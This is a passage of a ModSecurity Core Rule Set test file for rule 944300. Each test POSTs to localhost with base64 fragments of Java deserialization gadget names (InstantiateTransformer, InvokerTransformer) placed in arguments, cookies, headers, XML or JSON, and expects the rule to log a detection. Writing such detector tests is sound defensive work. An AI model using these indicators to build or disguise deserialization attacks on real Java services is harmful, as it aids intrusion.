dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-182 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-183 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-184 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-185 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" output: log_contains: "id \"944300\"" - test_title: 944300-186 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-187 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-188 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" output: log_contains: "id \"944300\"" - test_title: 944300-189 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-190 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-191 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-192 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-193 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-194 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-195 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-196 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" output: log_contains: "id \"944300\"" - test_title: 944300-197 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-198 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=aW52b2tlcnRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-199 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy=test" output: log_contains: "id \"944300\"" - test_title: 944300-200 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-201 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-202 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: aW52b2tlcnRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-203 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-204 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-205 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-206 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=aW52b2tlcnRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-207 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" output: log_contains: "id \"944300\"" - test_title: 944300-208 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-209 desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-210 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" output: log_contains: "id \"944300\"" - test_title: 944300-211 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-212 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-213 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Gludm9rZXJ0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-214 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-215 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-216 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-217 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-218 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" output: log_contains: "id \"944300\"" - test_title: 944300-219 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-220 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-221 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI=test" output: log_contains: "id \"944300\"" - test_title: 944300-222 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-223 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-224 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BpbnZva2VydHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-225 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-226 desc: "XML element value includes keyword 